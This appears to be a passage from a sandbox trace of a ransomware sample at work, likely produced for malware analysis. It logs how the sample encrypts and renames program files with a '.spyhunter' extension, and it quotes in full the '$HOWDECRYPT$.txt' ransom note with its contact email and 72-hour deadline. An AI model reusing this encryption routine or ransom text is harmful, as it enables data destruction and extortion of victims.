pdwDataLen=0x25ce6a0*=0x30) returned 1 [0162.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.361] GetProcessHeap () returned 0x2c0000 [0162.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.361] GetProcessHeap () returned 0x2c0000 [0162.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5de8 | out: hHeap=0x2c0000) returned 1 [0162.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6a0 | out: pbBuffer=0x25ce6a0) returned 1 [0162.361] GetProcessHeap () returned 0x2c0000 [0162.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce698*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce698*=0x30) returned 1 [0162.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.361] GetProcessHeap () returned 0x2c0000 [0162.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.362] GetProcessHeap () returned 0x2c0000 [0162.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c821c8 | out: hHeap=0x2c0000) returned 1 [0162.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6a0 | out: pbBuffer=0x25ce6a0) returned 1 [0162.362] GetProcessHeap () returned 0x2c0000 [0162.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce698*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce698*=0x30) returned 1 [0162.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.387] GetProcessHeap () returned 0x2c0000 [0162.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.387] GetProcessHeap () returned 0x2c0000 [0162.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5cd0 | out: hHeap=0x2c0000) returned 1 [0162.387] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce698 | out: pbBuffer=0x25ce698) returned 1 [0162.387] GetProcessHeap () returned 0x2c0000 [0162.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce690*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce690*=0x30) returned 1 [0162.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\client.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.388] GetProcessHeap () returned 0x2c0000 [0162.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.388] GetProcessHeap () returned 0x2c0000 [0162.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa500 | out: hHeap=0x2c0000) returned 1 [0162.388] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.388] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.389] WriteFile (in: hFile=0x178, lpBuffer=0x25ce5cb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce6f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce5cb*, lpNumberOfBytesWritten=0x25ce6f4*=0x127, lpOverlapped=0x0) returned 1 [0162.389] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.389] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce6f4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce6f4*=0x2ac, lpOverlapped=0x0) returned 1 [0162.389] CloseHandle (hObject=0x178) returned 1 [0162.390] GetProcessHeap () returned 0x2c0000 [0162.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8c18 | out: hHeap=0x2c0000) returned 1 [0162.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce690 | out: pbBuffer=0x25ce690) returned 1 [0162.390] GetProcessHeap () returned 0x2c0000 [0162.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce688*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce688*=0x30) returned 1 [0162.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.391] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml") returned 101 [0162.391] StrStrW (lpFirst="FrameworkList.xml", lpSrch=".txt") returned 0x0 [0162.391] GetProcessHeap () returned 0x2c0000 [0162.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0162.391] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce64c*=0x1632, lpOverlapped=0x0) returned 1 [0162.529] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe9ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.530] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1632, lpNumberOfBytesWritten=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce64c*=0x1632, lpOverlapped=0x0) returned 1 [0162.530] GetProcessHeap () returned 0x2c0000 [0162.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0162.530] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.530] WriteFile (in: hFile=0x178, lpBuffer=0x25ce68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x25ce68c*, lpNumberOfBytesWritten=0x25ce64c*=0x4, lpOverlapped=0x0) returned 1 [0162.530] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce64c*=0x30, lpOverlapped=0x0) returned 1 [0162.530] CloseHandle (hObject=0x178) returned 1 [0162.530] GetProcessHeap () returned 0x2c0000 [0162.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.530] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.spyhunter") returned 111 [0162.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.spyhunter" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.spyhunter")) returned 1 [0162.532] GetProcessHeap () returned 0x2c0000 [0162.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.532] GetProcessHeap () returned 0x2c0000 [0162.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.532] GetProcessHeap () returned 0x2c0000 [0162.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8b00 | out: hHeap=0x2c0000) returned 1 [0162.532] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce690 | out: pbBuffer=0x25ce690) returned 1 [0162.532] GetProcessHeap () returned 0x2c0000 [0162.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.532] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce688*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce688*=0x30) returned 1 [0162.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.649] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets") returned 106 [0162.649] StrStrW (lpFirst="Workflow.VisualBasic.Targets", lpSrch=".txt") returned 0x0 [0162.649] GetProcessHeap () returned 0x2c0000 [0162.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0162.649] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce64c*=0x143e, lpOverlapped=0x0) returned 1 [0162.650] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffebc2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.650] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x143e, lpNumberOfBytesWritten=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce64c*=0x143e, lpOverlapped=0x0) returned 1 [0162.650] GetProcessHeap () returned 0x2c0000 [0162.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.650] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.650] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce68c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x25ce68c*, lpNumberOfBytesWritten=0x25ce64c*=0x4, lpOverlapped=0x0) returned 1 [0162.651] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce64c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce64c*=0x30, lpOverlapped=0x0) returned 1 [0162.651] CloseHandle (hObject=0xb0) returned 1 [0162.651] GetProcessHeap () returned 0x2c0000 [0162.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.651] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets.spyhunter") returned 116 [0162.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets.spyhunter" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets.spyhunter")) returned 1 [0162.652] GetProcessHeap () returned 0x2c0000 [0162.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.652] GetProcessHeap () returned 0x2c0000 [0162.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.652] GetProcessHeap () returned 0x2c0000 [0162.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac998 | out: hHeap=0x2c0000) returned 1 [0162.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce688 | out: pbBuffer=0x25ce688) returned 1 [0162.652] GetProcessHeap () returned 0x2c0000 [0162.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce680*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce680*=0x30) returned 1 [0162.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\controllercoupon.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\controllercoupon.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.652] GetProcessHeap () returned 0x2c0000 [0162.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.653] GetProcessHeap () returned 0x2c0000 [0162.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb1bb8 | out: hHeap=0x2c0000) returned 1 [0162.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.653] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.653] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5bb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce6e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce5bb*, lpNumberOfBytesWritten=0x25ce6e4*=0x127, lpOverlapped=0x0) returned 1 [0162.654] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.654] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce6e4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce6e4*=0x2ac, lpOverlapped=0x0) returned 1 [0162.654] CloseHandle (hObject=0xb0) returned 1 [0162.654] GetProcessHeap () returned 0x2c0000 [0162.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e61ec8 | out: hHeap=0x2c0000) returned 1 [0162.654] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce680 | out: pbBuffer=0x25ce680) returned 1 [0162.655] GetProcessHeap () returned 0x2c0000 [0162.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce678*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce678*=0x30) returned 1 [0162.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.655] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini") returned 64 [0162.655] StrStrW (lpFirst="webapprt.ini", lpSrch=".txt") returned 0x0 [0162.655] GetProcessHeap () returned 0x2c0000 [0162.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0162.655] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce63c*=0x1e7, lpOverlapped=0x0) returned 1 [0162.656] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.656] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1e7, lpNumberOfBytesWritten=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce63c*=0x1e7, lpOverlapped=0x0) returned 1 [0162.656] GetProcessHeap () returned 0x2c0000 [0162.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.656] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.657] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x25ce67c*, lpNumberOfBytesWritten=0x25ce63c*=0x4, lpOverlapped=0x0) returned 1 [0162.657] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce63c*=0x30, lpOverlapped=0x0) returned 1 [0162.657] CloseHandle (hObject=0xb0) returned 1 [0162.657] GetProcessHeap () returned 0x2c0000 [0162.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.657] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini.spyhunter") returned 74 [0162.657] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\webapprt.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\webapprt.ini.spyhunter")) returned 1 [0162.658] GetProcessHeap () returned 0x2c0000 [0162.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.658] GetProcessHeap () returned 0x2c0000 [0162.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.658] GetProcessHeap () returned 0x2c0000 [0162.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06b48 | out: hHeap=0x2c0000) returned 1 [0162.658] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce680 | out: pbBuffer=0x25ce680) returned 1 [0162.658] GetProcessHeap () returned 0x2c0000 [0162.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce678*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce678*=0x30) returned 1 [0162.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0162.659] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja") returned 59 [0162.659] StrStrW (lpFirst="omni.ja", lpSrch=".txt") returned 0x0 [0162.659] GetProcessHeap () returned 0x2c0000 [0162.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0162.659] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce63c*=0x2800, lpOverlapped=0x0) returned 1 [0162.676] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.676] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce63c*=0x2800, lpOverlapped=0x0) returned 1 [0162.676] GetProcessHeap () returned 0x2c0000 [0162.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.676] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.676] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce63c, lpOverlapped=0x0 | out: lpBuffer=0x25ce67c*, lpNumberOfBytesWritten=0x25ce63c*=0x4, lpOverlapped=0x0) returned 1 [0162.676] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce63c, 